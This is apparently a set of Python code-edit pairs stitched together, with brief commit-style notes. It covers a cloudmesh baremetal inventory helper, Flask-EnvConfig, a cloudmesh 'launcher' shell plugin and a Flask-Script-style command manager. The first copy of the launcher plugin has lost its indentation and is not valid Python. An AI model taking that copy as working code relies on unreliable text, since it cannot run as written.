    elem = {"cm_kind": "baremetal", "cm_type": "bm_list_inventory",}
    found = self.db_client.find_one(elem)
    if found["result"] and found["data"]:
        # document already present; nothing to insert
        return True
    inserted = self.db_client.insert(elem)
    return inserted["result"]
def enable_baremetal_computers(self, hosts):
    """Add the listed *hosts* to the baremetal computers document.

    :param list hosts: hosts of the form ["host1", "host2",]
    :return: True means enabled successfully, otherwise False
    """
    if not hosts:
        # nothing to do is a success
        return True
    query_elem = {"cm_kind": "baremetal", "cm_type": "bm_list_inventory", }
    # $addToSet/$each keeps the list duplicate-free
    update_elem = {"$addToSet": {"data": {"$each": hosts}}}
    return self.db_client.atom_update(query_elem, update_elem)["result"]
def disable_baremetal_computers(self, hosts):
    """Remove the listed *hosts* from the baremetal computers document.

    :param list hosts: hosts of the form ["host1", "host2",]
    :return: True means disabled successfully, otherwise False
    """
    if not hosts:
        # nothing to do is a success
        return True
    query_elem = {"cm_kind": "baremetal", "cm_type": "bm_list_inventory", }
    update_elem = {"$pull": {"data": {"$in": hosts}}}
    return self.db_client.atom_update(query_elem, update_elem)["result"]
def get_baremetal_computers(self):
    """Fetch the list of baremetal computers.

    :return: hosts of the form ["host1", "host2",], [] when the document
        has no data field, or None when the lookup failed
    """
    query = {"cm_kind": "baremetal", "cm_type": "bm_list_inventory", }
    found = self.db_client.find_one(query)
    if not found["result"]:
        return None
    doc = found["data"]
    return doc.get("data", [])
# test: ad-hoc exercise code, only runs when executed as a script
if __name__ == "__main__":
    from pprint import pprint
    bmc = BaremetalComputer()
    """
    data = bmc.insert_mac_data_to_inventory()
    print data
    for host in ["???", "???", "???"]:
        data = bmc.get_host_info(host)
        pprint(data)
    """
    #result = bmc.get_host_info("i080")
    #result = bmc.insert_blank_baremetal_list()
    #result = bmc.enable_baremetal_computers(["i001", "i003", "i007", "i189"])
    #result = bmc.disable_baremetal_computers(["i001", "i007",])
    result = bmc.get_baremetal_computers()
    pprint(result)
|
# -*- coding: utf-8 -*-
"""
FLask-EnvConfig
:copyright: (c) 2014 by Lars Hansson.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import ast
from os import environ
# environment variables must start with this prefix to be picked up
DEFAULT_ENV_PREFIX = 'FLASK_'


class EnvConfig(object):
    """Configure Flask from environment variables.

    Every environment variable whose name starts with *prefix* (default
    ``FLASK_``) is copied into ``app.config`` with the prefix stripped;
    values that parse as Python literals (ints, bools, lists, ...) are
    converted, everything else is kept as a string.
    """

    def __init__(self, app=None, prefix=DEFAULT_ENV_PREFIX):
        self.app = app
        if app is not None:
            self.init_app(app, prefix)

    def init_app(self, app, prefix=DEFAULT_ENV_PREFIX):
        # .items() works on Python 2 and 3; the original .iteritems()
        # raises AttributeError under Python 3
        for key, value in environ.items():
            if key.startswith(prefix):
                key = key[len(prefix):]
                try:
                    # convert "1", "True", "[1, 2]", ... to real Python values
                    value = ast.literal_eval(value)
                except (ValueError, SyntaxError):
                    pass  # not a literal: keep the raw string
                app.config[key] = value
Support Python 3.
# -*- coding: utf-8 -*-
"""
FLask-EnvConfig
:copyright: (c) 2014 by Lars Hansson.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import ast
from os import environ
import sys
DEFAULT_ENV_PREFIX = 'FLASK_'   # only variables starting with this prefix are read
PY2 = sys.version_info[0] == 2  # True when running under Python 2


def iteritems(d):
    """Iterate the (key, value) pairs of *d* on both Python 2 and 3."""
    return d.iteritems() if PY2 else d.items()


class EnvConfig(object):
    """Configure Flask from environment variables.

    Prefixed environment variables are copied into ``app.config`` with the
    prefix stripped; literal-looking values are converted via
    ``ast.literal_eval``, everything else stays a string.
    """

    def __init__(self, app=None, prefix=DEFAULT_ENV_PREFIX):
        self.app = app
        if app is not None:
            self.init_app(app, prefix)

    def init_app(self, app, prefix=DEFAULT_ENV_PREFIX):
        for key, value in iteritems(environ):
            if not key.startswith(prefix):
                continue
            name = key[len(prefix):]
            try:
                value = ast.literal_eval(value)
            except (ValueError, SyntaxError):
                pass  # not a literal: keep the raw string
            app.config[name] = value
|
# import os
from __future__ import print_function
import sys
import traceback
from pprint import pprint
from cloudmesh_install.util import path_expand
from cloudmesh_common.logger import LOGGER
# from cloudmesh_common.tables import row_table
from cloudmesh_common.util import get_rand_string
from cloudmesh.config.ConfigDict import ConfigDict
from cloudmesh.config.cm_config import cm_config
from cloudmesh.user.cm_user import cm_user
from cloudmesh.cm_mongo import cm_mongo
from cmd3.shell import command
from cmd3.console import Console
from cloudmesh.util.shellutil import shell_commands_dict_output
from cloudmesh.util.config import ordered_dump
from cloudmesh_common.util import dict_uni_to_ascii
log = LOGGER(__file__)  # module-level logger for this cmd3 plugin
class cm_shell_launcher:
    """cmd3 plugin class providing the `launcher` command (Chef-cookbook based stacks)."""
    _id = "t_stacks"  # id for stack in cm_mongo
def activate_cm_shell_launcher(self):
    """cmd3 activation hook: register `launcher` under the `cloud` topic."""
    self.register_command_topic('cloud', 'launcher')
def get_cloud_name(self, cm_user_id):
    """Return the user's default cloud name, or None when none is set.

    :param cm_user_id: cloudmesh user id whose defaults are consulted
    """
    try:
        defaults = self.cm_user.get_defaults(cm_user_id)
        return defaults['cloud']
    except KeyError:
        # no 'cloud' default configured for this user
        log.error('set a default cloud with openstack. "stack" works on'
                  ' openstack platform only')
        return None
@command
def do_launcher(self, args, arguments):
"""
Usage:
launcher start COOKBOOK
launcher stop STACK_NAME
launcher list
launcher cookbook [--column=COLUMN] [--format=FORMAT]
launcher import [FILEPATH] [--force]
launcher export FILEPATH
launcher help | -h
An orchestration tool with Chef Cookbooks
Arguments:
COOKBOOK Name of a cookbook
STACK_NAME Name of a launcher
FILEPATH Filepath
COLUMN column name to display
FORMAT display format (json, table)
help Prints this message
Options:
-v verbose mode
"""
log.info(arguments)
self.cm_mongo = cm_mongo()
self.cm_config = cm_config()
self.user = cm_user()
if arguments["help"] or arguments["-h"]:
print (self.do_launcher.__doc__)
elif arguments['cookbook']:
userid = self.cm_config.username()
launchers = self.cm_mongo.launcher_get(userid)
if launchers.count() == 0:
Console.warning("no launcher in database, please import launcher first"
"(launcher import [FILEPATH] [--force])")
return
else:
d = {}
for launcher in launchers:
d[launcher['cm_launcher']] = launcher
if "_id" in d[launcher['cm_launcher']]:
del d[launcher['cm_launcher']]['_id']
columns = None
if arguments['--column']:
if arguments['--column'] != "all":
columns = [x.strip() for x in arguments['--column'].split(',')]
else:
columns = ['name', 'description']
if arguments['--format']:
if arguments['--format'] not in ['table', 'json', 'csv']:
Console.error("please select printing format ",
"among table, json and csv")
return
else:
p_format = arguments['--format']
else:
p_format = None
shell_commands_dict_output(d,
print_format=p_format,
firstheader="launcher",
header=columns
# vertical_table=True
)
elif arguments['list']:
userid = self.cm_config.username()
self.cm_mongo.activate(userid)
self.cm_mongo.refresh(cm_user_id=userid, types=[self._id])
stacks = self.cm_mongo.stacks(cm_user_id=userid)
launchers = self.filter_launcher(
stacks,
{"search": "contain",
"key": "stack_name",
"value": "launcher"}
)
log.debug(launchers)
d = {}
for k0, v0 in launchers.iteritems():
for k1, v1 in launchers[k0].iteritems():
d[v1['id']] = v1
columns = ['stack_name', 'description', 'stack_status',
'creation_time', 'cm_cloud']
if arguments['--column'] and arguments['--column'] != "all":
columns = [x.strip() for x in arguments['--column'].split(',')]
if arguments['--format']:
if arguments['--format'] not in ['table', 'json', 'csv']:
Console.error("please select printing format among table, json and csv")
return
else:
p_format = arguments['--format']
else:
p_format = None
shell_commands_dict_output(d,
print_format=p_format,
firstheader="launcher_id",
header=columns
# vertical_table=True
)
elif arguments['start'] and arguments['COOKBOOK']:
userid = self.cm_config.username()
def_cloud = self.get_cloud_name(userid)
self.cm_mongo.activate(userid)
keyname = self.user.get_defaults(userid)['key']
cookbook = arguments['COOKBOOK']
s_name = "launcher-{0}-{1}-{2}".format(userid, cookbook, get_rand_string())
passwdHash = "123456789" # doing nothing. just for test
t_url = "https://raw.githubusercontent.com/cloudmesh/cloudmesh/dev/heat-templates/centos6/launcher/launcher.yaml"
param = {'KeyName': keyname,
'Cookbook': cookbook,
'PasswdHash': passwdHash}
log.debug(def_cloud, userid, s_name, t_url, param)
res = self.cm_mongo.stack_create(cloud=def_cloud, cm_user_id=userid,
servername=s_name,
template_url=t_url,
parameters=param)
log.debug(res)
return res
elif arguments['stop'] and arguments['STACK_NAME']:
userid = self.cm_config.username()
def_cloud = self.get_cloud_name(userid)
s_id = arguments['STACK_NAME']
self.cm_mongo.activate(userid)
res = self.cm_mongo.stack_delete(cloud=def_cloud,
cm_user_id=userid,
server=s_id)
log.debug(res)
return res
elif arguments['import']:
filepath = "~/.cloudmesh/cloudmesh_launcher.yaml"
if arguments['FILEPATH']:
filepath = arguments['FILEPATH']
try:
filename = path_expand(filepath)
fileconfig = ConfigDict(filename=filename)
except Exception, err:
Console.error(
"error while loading '{0}', please check".format(filepath))
print (traceback.format_exc())
print (sys.exc_info()[0])
return
try:
recipes_dict = fileconfig.get("cloudmesh", "launcher", "recipies")
except:
Console.error("error while loading recipies from the file")
# print recipes_dict
userid = self.cm_config.username()
launcher_names = []
launchers = self.cm_mongo.launcher_get(userid)
for launcher in launchers:
launcher_names.append(launcher['cm_launcher'].encode("ascii"))
for key in recipes_dict:
if key in launcher_names:
if arguments['--force']:
self.cm_mongo.launcher_remove(userid, key)
self.cm_mongo.launcher_import(
recipes_dict[key], key, userid)
print ("launcher '{0}' overwritten.".format(key))
else:
print ("ERROR: launcher '{0}' exists, "
"please remove it first, or use "
"'--force' when adding".format(key))
else:
self.cm_mongo.launcher_import(
recipes_dict[key], key, userid)
print ("launcher '{0}' added.".format(key))
elif arguments['export']:
userid = self.cm_config.username()
launchers = self.cm_mongo.launcher_get(userid)
if launchers.count() == 0:
Console.warning(
"no launcher in database, "
"please import launcher first"
"(launcher import [FILEPATH] [--force])")
else:
d = {}
for launcher in launchers:
key = launcher['cm_launcher']
d[key] = launcher
if "_id" in d[key]:
del d[key]['_id']
if "cm_launcher" in d[key]:
del d[key]['cm_launcher']
if "cm_kind" in d[key]:
del d[key]['cm_kind']
if "cm_user_id" in d[key]:
del d[key]['cm_user_id']
d = dict_uni_to_ascii(d)
d = {"meta": {"yaml_version": "2.1",
"kind": "launcher"},
"cloudmesh": {"launcher": {"recipies": d}}}
pprint(d)
print ("exporting to {0}...".format(arguments['FILEPATH']))
try:
filename = path_expand(arguments['FILEPATH'])
stream = file(filename, 'w')
ordered_dump(d, stream=stream)
Console.ok("done")
except Exception, err:
Console.error("failed exporting to {0}"
.format(arguments['FILEPATH']))
print (traceback.format_exc())
print (sys.exc_info()[0])
def filter_launcher(self, stacks, _filter):
"""Returns if it satisfies the condition of the filter.
Description:
This is being used to filter out other stacks not related
to launcher. Launcher should starts with 'launcher-xxx'
in its stack_name. This way, we can separate general
stacks and launcher stacks.
parameter:
stacks (dict): all stacks
_filter (dict): key, value, search
"""
new_stacks = {}
for k0, v0 in stacks.iteritems():
new_stacks[k0] = {}
for k1, v1 in stacks[k0].iteritems():
try:
value = stacks[k0][k1][_filter['key']]
if _filter['search'] == "contain":
if _filter['value'] in value:
new_stacks[k0][k1] = v1
except KeyError:
pass
return new_stacks
Renamed the launcher subcommand argument from COOKBOOK to MENU (cookbook -> menu).
# import os
from __future__ import print_function
import sys
import traceback
from pprint import pprint
from cloudmesh_install.util import path_expand
from cloudmesh_common.logger import LOGGER
# from cloudmesh_common.tables import row_table
from cloudmesh_common.util import get_rand_string
from cloudmesh.config.ConfigDict import ConfigDict
from cloudmesh.config.cm_config import cm_config
from cloudmesh.user.cm_user import cm_user
from cloudmesh.cm_mongo import cm_mongo
from cmd3.shell import command
from cmd3.console import Console
from cloudmesh.util.shellutil import shell_commands_dict_output
from cloudmesh.util.config import ordered_dump
from cloudmesh_common.util import dict_uni_to_ascii
log = LOGGER(__file__)
class cm_shell_launcher:

    """cmd3 shell plugin providing the 'launcher' command.

    A launcher is a Heat stack whose stack_name carries a 'launcher-'
    prefix; this class lists, starts, stops, imports and exports such
    launchers through cloudmesh's mongo layer.
    """

    _id = "t_stacks"  # id for stack in cm_mongo

    def activate_cm_shell_launcher(self):
        # Register 'launcher' under the 'cloud' help topic of the shell.
        self.register_command_topic('cloud', 'launcher')
        pass

    def get_cloud_name(self, cm_user_id):
        """Returns the user's default cloud name, or None if unset.

        The launcher works on the OpenStack platform only, so a missing
        default cloud is reported as an error instead of being guessed.
        """
        try:
            return self.cm_user.get_defaults(cm_user_id)['cloud']
        except KeyError:
            log.error('set a default cloud with openstack. "stack" works on'
                      ' openstack platform only')
            return None

    @command
    def do_launcher(self, args, arguments):
        """
        Usage:
            launcher start MENU
            launcher stop STACK_NAME
            launcher list
            launcher menu [--column=COLUMN] [--format=FORMAT]
            launcher import [FILEPATH] [--force]
            launcher export FILEPATH
            launcher help | -h

        An orchestration tool with Chef Cookbooks

        Arguments:

          MENU           Name of a cookbook
          STACK_NAME     Name of a launcher
          FILEPATH       Filepath
          COLUMN         column name to display
          FORMAT         display format (json, table)
          help           Prints this message

        Options:

           -v       verbose mode

        """
        log.info(arguments)
        self.cm_mongo = cm_mongo()
        self.cm_config = cm_config()
        self.user = cm_user()

        if arguments["help"] or arguments["-h"]:
            print (self.do_launcher.__doc__)

        elif arguments['menu']:
            userid = self.cm_config.username()
            launchers = self.cm_mongo.launcher_get(userid)
            if launchers.count() == 0:
                Console.warning("no launcher in database, please import launcher first"
                                "(launcher import [FILEPATH] [--force])")
                return
            else:
                d = {}
                for launcher in launchers:
                    d[launcher['cm_launcher']] = launcher
                    # mongo's internal _id is not printable/serializable
                    if "_id" in d[launcher['cm_launcher']]:
                        del d[launcher['cm_launcher']]['_id']
            columns = None
            if arguments['--column']:
                if arguments['--column'] != "all":
                    columns = [x.strip() for x in arguments['--column'].split(',')]
            else:
                columns = ['name', 'description']
            if arguments['--format']:
                if arguments['--format'] not in ['table', 'json', 'csv']:
                    # single message string: Console.error is called with one
                    # argument everywhere else in this command
                    Console.error("please select printing format among table, json and csv")
                    return
                else:
                    p_format = arguments['--format']
            else:
                p_format = None
            shell_commands_dict_output(d,
                                       print_format=p_format,
                                       firstheader="launcher",
                                       header=columns
                                       # vertical_table=True
                                       )
        elif arguments['list']:
            userid = self.cm_config.username()
            self.cm_mongo.activate(userid)
            self.cm_mongo.refresh(cm_user_id=userid, types=[self._id])
            stacks = self.cm_mongo.stacks(cm_user_id=userid)
            launchers = self.filter_launcher(
                stacks,
                {"search": "contain",
                 "key": "stack_name",
                 "value": "launcher"}
            )
            log.debug(launchers)
            d = {}
            # flatten {cloud: {stack_id: stack}} into {stack id: stack}
            for k0, v0 in launchers.items():
                for k1, v1 in launchers[k0].items():
                    d[v1['id']] = v1
            columns = ['stack_name', 'description', 'stack_status',
                       'creation_time', 'cm_cloud']
            if arguments['--column'] and arguments['--column'] != "all":
                columns = [x.strip() for x in arguments['--column'].split(',')]
            if arguments['--format']:
                if arguments['--format'] not in ['table', 'json', 'csv']:
                    Console.error("please select printing format among table, json and csv")
                    return
                else:
                    p_format = arguments['--format']
            else:
                p_format = None
            shell_commands_dict_output(d,
                                       print_format=p_format,
                                       firstheader="launcher_id",
                                       header=columns
                                       # vertical_table=True
                                       )
        # BUGFIX: the guard previously tested arguments['COOKBOOK'], a key
        # that no longer exists after the COOKBOOK -> MENU rename in the
        # usage string, so the 'start' branch could never run.
        elif arguments['start'] and arguments['MENU']:
            userid = self.cm_config.username()
            def_cloud = self.get_cloud_name(userid)
            self.cm_mongo.activate(userid)
            keyname = self.user.get_defaults(userid)['key']
            cookbook = arguments['MENU']
            s_name = "launcher-{0}-{1}-{2}".format(userid, cookbook, get_rand_string())
            passwdHash = "123456789"  # doing nothing. just for test
            t_url = "https://raw.githubusercontent.com/cloudmesh/cloudmesh/dev/heat-templates/centos6/launcher/launcher.yaml"
            param = {'KeyName': keyname,
                     'Cookbook': cookbook,
                     'PasswdHash': passwdHash}
            log.debug(def_cloud, userid, s_name, t_url, param)
            res = self.cm_mongo.stack_create(cloud=def_cloud, cm_user_id=userid,
                                             servername=s_name,
                                             template_url=t_url,
                                             parameters=param)
            log.debug(res)
            return res
        elif arguments['stop'] and arguments['STACK_NAME']:
            userid = self.cm_config.username()
            def_cloud = self.get_cloud_name(userid)
            s_id = arguments['STACK_NAME']
            self.cm_mongo.activate(userid)
            res = self.cm_mongo.stack_delete(cloud=def_cloud,
                                             cm_user_id=userid,
                                             server=s_id)
            log.debug(res)
            return res
        elif arguments['import']:
            filepath = "~/.cloudmesh/cloudmesh_launcher.yaml"
            if arguments['FILEPATH']:
                filepath = arguments['FILEPATH']
            try:
                filename = path_expand(filepath)
                fileconfig = ConfigDict(filename=filename)
            except Exception:
                Console.error(
                    "error while loading '{0}', please check".format(filepath))
                print (traceback.format_exc())
                print (sys.exc_info()[0])
                return
            try:
                recipes_dict = fileconfig.get("cloudmesh", "launcher", "recipies")
            except Exception:
                Console.error("error while loading recipies from the file")
                # without this return, recipes_dict would be undefined below
                # and raise a NameError
                return
            # print recipes_dict
            userid = self.cm_config.username()
            launcher_names = []
            launchers = self.cm_mongo.launcher_get(userid)
            for launcher in launchers:
                launcher_names.append(launcher['cm_launcher'].encode("ascii"))
            for key in recipes_dict:
                if key in launcher_names:
                    if arguments['--force']:
                        self.cm_mongo.launcher_remove(userid, key)
                        self.cm_mongo.launcher_import(
                            recipes_dict[key], key, userid)
                        print ("launcher '{0}' overwritten.".format(key))
                    else:
                        print ("ERROR: launcher '{0}' exists, "
                               "please remove it first, or use "
                               "'--force' when adding".format(key))
                else:
                    self.cm_mongo.launcher_import(
                        recipes_dict[key], key, userid)
                    print ("launcher '{0}' added.".format(key))
        elif arguments['export']:
            userid = self.cm_config.username()
            launchers = self.cm_mongo.launcher_get(userid)
            if launchers.count() == 0:
                Console.warning(
                    "no launcher in database, "
                    "please import launcher first"
                    "(launcher import [FILEPATH] [--force])")
            else:
                d = {}
                for launcher in launchers:
                    key = launcher['cm_launcher']
                    d[key] = launcher
                    # strip mongo bookkeeping fields before exporting
                    if "_id" in d[key]:
                        del d[key]['_id']
                    if "cm_launcher" in d[key]:
                        del d[key]['cm_launcher']
                    if "cm_kind" in d[key]:
                        del d[key]['cm_kind']
                    if "cm_user_id" in d[key]:
                        del d[key]['cm_user_id']
                d = dict_uni_to_ascii(d)
                d = {"meta": {"yaml_version": "2.1",
                              "kind": "launcher"},
                     "cloudmesh": {"launcher": {"recipies": d}}}
                pprint(d)
                print ("exporting to {0}...".format(arguments['FILEPATH']))
                try:
                    filename = path_expand(arguments['FILEPATH'])
                    # 'with open' closes the file even on failure; the old
                    # code used the Python-2-only file() and never closed it
                    with open(filename, 'w') as stream:
                        ordered_dump(d, stream=stream)
                    Console.ok("done")
                except Exception:
                    Console.error("failed exporting to {0}"
                                  .format(arguments['FILEPATH']))
                    print (traceback.format_exc())
                    print (sys.exc_info()[0])

    def filter_launcher(self, stacks, _filter):
        """Return only the stacks that satisfy the filter condition.

        This is being used to filter out other stacks not related
        to launcher. A launcher's stack_name starts with 'launcher-xxx',
        which is how launcher stacks are separated from general stacks.

        :param stacks: mapping of cloud name -> {stack id -> stack dict}
        :param _filter: dict with 'key', 'value' and 'search'; only
                        search == "contain" is supported
        """
        new_stacks = {}
        # .items() instead of the Python-2-only .iteritems()
        for k0, v0 in stacks.items():
            new_stacks[k0] = {}
            for k1, v1 in stacks[k0].items():
                try:
                    value = stacks[k0][k1][_filter['key']]
                    if _filter['search'] == "contain":
                        if _filter['value'] in value:
                            new_stacks[k0][k1] = v1
                except KeyError:
                    pass
        return new_stacks
|
# -*- coding: utf-8 -*-
import sys
import code
import getpass
import inspect
import warnings
import argparse
from flask import Flask
__all__ = ["Command", "Shell", "Server", "Manager", "Option",
"prompt", "prompt_pass", "prompt_bool", "prompt_choices"]
def prompt(name, default=None):
    """
    Grab user input from command line.

    :param name: prompt text
    :param default: default value if no input provided.
    """
    # Show a truthy default inside brackets; questions end with a space,
    # everything else with ": ".
    hint = ' [%s]' % default if default else ''
    tail = ' ' if name.endswith('?') else ': '
    message = name + hint + tail
    while True:
        reply = raw_input(message)
        if reply:
            return reply
        if default is not None:
            return default
def prompt_pass(name, default=None):
    """
    Grabs hidden (password) input from command line.

    :param name: prompt text
    :param default: default value if no input provided.
    """
    # Same message layout as prompt(), but input is read without echo.
    hint = ' [%s]' % default if default else ''
    tail = ' ' if name.endswith('?') else ': '
    message = name + hint + tail
    while True:
        reply = getpass.getpass(message)
        if reply:
            return reply
        if default is not None:
            return default
def prompt_bool(name, default=False, yes_choices=None, no_choices=None):
    """
    Grabs user input from command line and converts to boolean
    value.

    :param name: prompt text
    :param default: default value if no input provided.
    :param yes_choices: default 'y', 'yes', '1', 'on', 'true', 't'
    :param no_choices: default 'n', 'no', '0', 'off', 'false', 'f'
    """
    if not yes_choices:
        yes_choices = ('y', 'yes', '1', 'on', 'true', 't')
    if not no_choices:
        no_choices = ('n', 'no', '0', 'off', 'false', 'f')
    while True:
        reply = prompt(name + '?', 'Y' if default else 'N')
        if not reply:
            return default
        lowered = reply.lower()
        if lowered in yes_choices:
            return True
        if lowered in no_choices:
            return False
        # unrecognized answer: ask again
def prompt_choices(name, choices, default=None):
    """
    Grabs user input from command line from set of provided choices.

    :param name: prompt text
    :param choices: list or tuple of available choices
    :param default: default value if no input provided.
    """
    if default is None:
        default = choices[0]
    # the option list is constant for the whole loop, build it once
    label = '%s? - (%s)' % (name, ', '.join(choices))
    while True:
        reply = prompt(label, default).lower()
        if not reply:
            return default
        if reply in choices:
            # the literal choice 'none' maps to a None result
            return None if reply == 'none' else reply
class Option(object):
    """Container for one ``ArgumentParser.add_argument`` call.

    The positional arguments (a bare name or option strings such as
    ``-f``/``--foo``) and the keyword arguments (``action``, ``nargs``,
    ``const``, ``default``, ``type``, ``choices``, ``required``,
    ``help``, ``metavar``, ``dest`` — see `ArgumentParser.add_argument
    <http://argparse.googlecode.com/svn/trunk/doc/add_argument.html>`_)
    are stored untouched and replayed against an ``argparse`` parser
    when the owning command builds its parser.
    """

    def __init__(self, *args, **kwargs):
        # Pure data holder: nothing is validated until the option is
        # handed to argparse.
        self.args = args
        self.kwargs = kwargs
class Command(object):
    """
    Base class for creating commands.
    """

    # Default (empty) option list; subclasses may define their own.
    option_list = []

    @property
    def description(self):
        # Usage listings show the stripped docstring of the command.
        description = self.__doc__ or ''
        return description.strip()

    def add_option(self, option):
        """
        Adds Option to option list.
        """
        # Rebind to a new instance-level list instead of appending:
        # appending would mutate the class-level option_list that every
        # Command without its own list shares.
        self.option_list = self.option_list + [option]

    def get_options(self):
        """
        By default, returns self.option_list. Override if you
        need to do instance-specific configuration.
        """
        return self.option_list

    def create_parser(self, prog):
        """Build an argparse parser from this command's options."""
        parser = argparse.ArgumentParser(prog=prog,
                                         description=self.description)
        for option in self.get_options():
            parser.add_argument(*option.args, **option.kwargs)
        return parser

    def run(self, app):
        """
        Runs a command. This must be implemented by the subclass. The first
        argument is always the app (Flask instance) followed by arguments
        as configured by the Command options.
        """
        raise NotImplementedError

    # The deprecated wrappers below previously used warnings.warn_explicit,
    # which requires category/filename/lineno arguments and therefore
    # raised TypeError when called; warnings.warn is the correct API.
    def prompt(self, name, default=None):
        warnings.warn(
            "Command.prompt is deprecated, use prompt() function instead",
            DeprecationWarning)
        prompt(name, default)

    def prompt_pass(self, name, default=None):
        warnings.warn(
            "Command.prompt_pass is deprecated, use prompt_pass() function instead",
            DeprecationWarning)
        prompt_pass(name, default)

    def prompt_bool(self, name, default=False):
        warnings.warn(
            "Command.prompt_bool is deprecated, use prompt_bool() function instead",
            DeprecationWarning)
        prompt_bool(name, default)

    def prompt_choices(self, name, choices, default=None):
        warnings.warn(
            "Command.choices is deprecated, use prompt_choices() function instead",
            DeprecationWarning)
        prompt_choices(name, choices, default)
class Shell(Command):
    """
    Runs a Python shell inside Flask application context.
    :param banner: banner appearing at top of shell when started
    :param make_context: a callable returning a dict of variables
                         used in the shell namespace. The callable
                         takes a single argument, "app", the Flask
                         instance. By default returns a dict consisting
                         of just the app.
    :param use_ipython: use IPython shell if available, ignore if not.
                        The IPython shell can be turned off in command
                        line by passing the **--no-ipython** flag.
    """

    banner = ''

    def __init__(self, banner=None, make_context=None, use_ipython=True):
        self.banner = banner if banner else self.banner
        self.use_ipython = use_ipython
        if make_context is None:
            # default namespace: just the app itself
            def make_context(app):
                return dict(app=app)
        self.make_context = make_context

    def get_options(self):
        return (
            Option('--no-ipython',
                   action="store_true",
                   dest='no_ipython',
                   default=not (self.use_ipython)),)

    def get_context(self, app):
        """
        Returns a dict of context variables added to the shell namespace.
        """
        return self.make_context(app)

    def run(self, app, no_ipython):
        """
        Runs the shell. Unless no_ipython is True or use_python is False
        then runs IPython shell if that is installed.
        """
        context = self.get_context(app)
        if no_ipython:
            code.interact(self.banner, local=context)
            return
        try:
            # NOTE(review): IPython.Shell.IPShellEmbed is the pre-0.11
            # IPython API — confirm the deployed IPython version matches.
            import IPython
        except ImportError:
            code.interact(self.banner, local=context)
            return
        shell = IPython.Shell.IPShellEmbed(banner=self.banner)
        shell(global_ns=dict(), local_ns=context)
class Server(Command):
    """
    Runs the Flask development server i.e. app.run()
    :param host: server host
    :param port: server port
    :param use_debugger: if False, will no longer use Werkzeug debugger.
                         This can be overriden in the command line
                         by passing the **-d** flag.
    :param use_reloader: if False, will no longer use auto-reloader.
                         This can be overriden in the command line by
                         passing the **-r** flag.
    """

    def __init__(self, host='127.0.0.1', port=5000, use_debugger=True,
                 use_reloader=True):
        self.host = host
        self.port = port
        self.use_debugger = use_debugger
        self.use_reloader = use_reloader

    def get_options(self):
        options = (
            Option('-t', '--host',
                   dest='host',
                   default=self.host),
            Option('-p', '--port',
                   dest='port',
                   type=int,
                   default=self.port),
            # NOTE(review): with action='store_true' and a True default,
            # these flags cannot actually switch the feature off — confirm
            # whether --no-debug/--no-reload variants were intended.
            Option('-d', '--debug',
                   action='store_true',
                   dest='use_debugger',
                   default=self.use_debugger),
            Option('-r', '--reload',
                   action='store_true',
                   dest='use_reloader',
                   default=self.use_reloader),
        )
        return options

    def run(self, app, host, port, use_debugger, use_reloader):
        # Werkzeug's debug flag and the explicit use_debugger are kept in
        # sync, mirroring the original call.
        app.run(host=host, port=port, debug=use_debugger,
                use_debugger=use_debugger, use_reloader=use_reloader)
class InvalidCommand(Exception):
    """Raised when an unknown command name is passed to the Manager."""
    pass
class Manager(object):
    """
    Controller class for handling a set of commands.
    Typical usage::
        class Print(Command):
            def run(self, app):
                print "hello"
        app = Flask(__name__)
        manager = Manager(app)
        manager.add_command("print", Print())
        if __name__ == "__main__":
            manager.run()
    On command line::
        python manage.py print
        > hello
    :param app: Flask instance or callable returning a Flask instance.
    :param with_default_commands: load commands **runserver** and **shell**
                                  by default.
    """

    def __init__(self, app, with_default_commands=True):
        self.app = app
        self._commands = dict()
        self._options = list()
        if with_default_commands:
            self.add_default_commands()

    def add_default_commands(self):
        """
        Adds the shell and runserver default commands. To override these
        simply add your own equivalents using add_command or decorators.
        """
        self.add_command("shell", Shell())
        self.add_command("runserver", Server())

    def create_app(self, **kwargs):
        """Return the app: a Flask instance as-is, a factory is called."""
        if isinstance(self.app, Flask):
            return self.app
        return self.app(**kwargs)

    def create_parser(self, prog):
        """
        Creates an ArgumentParser instance from options returned
        by get_options(), and a subparser for the given command.
        """
        parser = argparse.ArgumentParser(prog=prog)
        for option in self.get_options():
            parser.add_argument(*option.args, **option.kwargs)
        return parser

    def get_options(self):
        """Return the application-wide options added via add_option()."""
        return self._options

    def add_option(self, *args, **kwargs):
        """
        Adds an application-wide option. This is useful if you want to set
        variables applying to the application setup, rather than individual
        commands.
        For this to work, the manager must be initialized with a factory
        function rather than an instance. Otherwise any options you set will
        be ignored.
        Arguments for this function are the same as for the Option class.
        """
        self._options.append(Option(*args, **kwargs))

    def command(self, func):
        """
        Adds a command function to the registry.

        :param func: command function. Should take at least one argument,
                     the Flask application. Additional arguments depend on
                     the options.
        """
        # NOTE(review): getargspec was removed in Python 3.11; kept for the
        # Python 2 target of this file.
        args, varargs, keywords, defaults = inspect.getargspec(func)
        options = []
        # first arg is always "app" : ignore
        args = args[1:]
        defaults = defaults or []
        # Defaults align with the END of the argument list, hence the
        # double reversal to pair each trailing arg with its default.
        kwargs = dict(zip(*[reversed(l) for l in (args, defaults)]))
        for arg in args:
            if arg in kwargs:
                default = kwargs[arg]
                if isinstance(default, bool):
                    # boolean defaults become flags
                    options.append(Option('-%s' % arg[0],
                                          '--%s' % arg,
                                          action="store_true",
                                          dest=arg,
                                          required=False,
                                          default=default))
                else:
                    options.append(Option('-%s' % arg[0],
                                          '--%s' % arg,
                                          dest=arg,
                                          required=False,
                                          default=default))
            else:
                # no default: positional argument
                options.append(Option(arg))
        command = Command()
        command.run = func
        command.__doc__ = func.__doc__
        command.option_list = options
        self.add_command(func.__name__, command)
        return func

    def shell(self, func):
        """
        Decorator that wraps function in shell command. The decorated
        function should take a single "app" argument, and return a dict.
        For more sophisticated usage use the Shell class.
        """
        self.add_command('shell', Shell(make_context=func))
        return func

    def option(self, *args, **kwargs):
        """
        Decorator to add an option to a function. Automatically registers
        the function - do not use together with ``@command``. You can add
        as many ``@option`` calls as you like.
        Takes the same arguments as the ``Option`` constructor.
        """
        option = Option(*args, **kwargs)

        def decorate(func):
            name = func.__name__
            if name not in self._commands:
                command = Command()
                command.run = func
                command.__doc__ = func.__doc__
                command.option_list = []
                self.add_command(name, command)
            self._commands[name].option_list.append(option)
            return func
        return decorate

    def add_command(self, name, command):
        """
        Adds command to registry.

        :param command: Command instance
        """
        self._commands[name] = command

    def get_usage(self):
        """
        Returns string consisting of all commands and their
        descriptions.
        """
        rv = []
        # .items() instead of Python-2-only .iteritems(): identical
